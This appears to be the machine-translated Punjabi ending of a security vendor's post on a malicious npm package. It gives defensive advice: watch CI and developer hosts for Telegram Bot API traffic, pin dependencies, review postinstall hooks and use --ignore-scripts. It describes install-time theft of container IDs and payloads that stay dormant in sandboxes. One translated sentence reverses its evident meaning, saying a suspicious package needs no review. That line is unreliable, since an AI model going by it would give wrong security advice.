CI ਅਤੇ ਡਿਵੈਲਪਰ ਹੋਸਟਾਂ ਤੋਂ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ API ਲਈ ਆਊਟਬਾਊਂਡ ਕਨੈਕਸ਼ਨਾਂ ਦੀ ਭਾਲ ਕਰੋ। ਜ਼ਿਆਦਾਤਰ ਬਿਲਡ ਵਾਤਾਵਰਣ ਕਦੇ ਵੀ ਇਸਨੂੰ ਨਹੀਂ ਕਹਿੰਦੇ; ਇੱਕ ਜੋ ਅਚਾਨਕ, ਇੰਸਟਾਲੇਸ਼ਨ ਤੋਂ ਤੁਰੰਤ ਬਾਅਦ ਅਜਿਹਾ ਹੁੰਦਾ ਹੈ, ਜਾਂਚ ਕਰਨ ਯੋਗ ਹੈ।

ਨਿਰਭਰਤਾਵਾਂ ਨੂੰ ਪਿੰਨ ਕਰੋ ਅਤੇ ਸਮੀਖਿਆ ਕਰੋ। ਇੱਕ ਬਿਲਕੁਲ ਨਵਾਂ ਪੈਕੇਜ ਜਿਸ ਵਿੱਚ ਇੱਕ ਆਮ ਕ੍ਰਿਪਟੋ ਨਾਮ ਹੈ, ਇੱਕ ਪੋਸਟਇੰਸਟਾਲ ਹੁੱਕ, ਅਤੇ ਕੋਈ ਵੀ ਰਿਪੋਜ਼ਟਰੀ ਲਿੰਕ ਲਾਕਫਾਈਲ ਵਿੱਚ ਦਾਖਲ ਹੋਣ ਤੋਂ ਪਹਿਲਾਂ ਇੱਕ ਨਜ਼ਰ ਮਾਰਨ ਦੀ ਲੋੜ ਨਹੀਂ ਰੱਖਦਾ।

ਕੰਟੇਨਰ-ਆਈਡੀ ਚੋਰੀ ਕਰਨ ਦੀ ਧਾਰਾ ਵੀ ਵਿਸ਼ਲੇਸ਼ਕਾਂ ਲਈ ਇੱਕ ਯਾਦ ਦਿਵਾਉਂਦੀ ਹੈ: ਇੱਕ ਇੰਸਟਾਲ-ਟਾਈਮ ਪੇਲੋਡ ਜੋ ਸੈਂਡਬੌਕਸ ਵਿੱਚ ਸੁਸਤ ਰਹਿੰਦਾ ਹੈ, ਸੁਭਾਵਕ ਨਹੀਂ ਹੁੰਦਾ, ਇਹ ਚੋਣਵਾਂ ਹੁੰਦਾ ਹੈ। ਇੰਸਟਾਲ ਮਾਰਗ ਦੀ ਸਥਿਰ ਸਮੀਖਿਆ ਇਹ ਦੇਖਣ ਦਾ ਭਰੋਸੇਯੋਗ ਤਰੀਕਾ ਹੈ ਕਿ ਕਿਹੜਾ ਗਤੀਸ਼ੀਲ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਦਿਖਾਉਣ ਵਿੱਚ ਗਿਰਾਵਟ ਆ ਸਕਦੀ ਹੈ।

ਹਵਾਲੇ

npm ਇੰਸਟਾਲ ਦਸਤਾਵੇਜ਼ — ਜੀਵਨ ਚੱਕਰ ਸਕ੍ਰਿਪਟਾਂ ਅਤੇ - ਅਣਡਿੱਠ-ਸਕ੍ਰਿਪਟਾਂ— ਆਟੋਮੈਟਿਕ ਇੰਸਟਾਲੇਸ਼ਨ ਨੂੰ ਅਯੋਗ ਕਰਨ ਲਈ ਹਵਾਲਾ hooks. 

sca-ਟੂਲਜ਼-ਸਾਫਟਵੇਅਰ-ਰਚਨਾ-ਵਿਸ਼ਲੇਸ਼ਣ-ਟੂਲਜ਼
ਆਪਣੇ ਸਾਫਟਵੇਅਰ ਜੋਖਮਾਂ ਨੂੰ ਤਰਜੀਹ ਦਿਓ, ਸੁਧਾਰੋ ਅਤੇ ਸੁਰੱਖਿਅਤ ਕਰੋ
ਆਪਣਾ ਮੁਫ਼ਤ ਖਾਤਾ ਪ੍ਰਾਪਤ ਕਰੋ।
ਕੋਈ ਕ੍ਰੈਡਿਟ ਕਾਰਡ ਦੀ ਲੋੜ ਨਹੀਂ ਹੈ

ਆਪਣੇ ਸਾਫਟਵੇਅਰ ਵਿਕਾਸ ਅਤੇ ਡਿਲੀਵਰੀ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕਰੋ

ਜ਼ਾਇਜੇਨੀ ਪ੍ਰੋਡਕਟ ਸੂਟ ਦੇ ਨਾਲ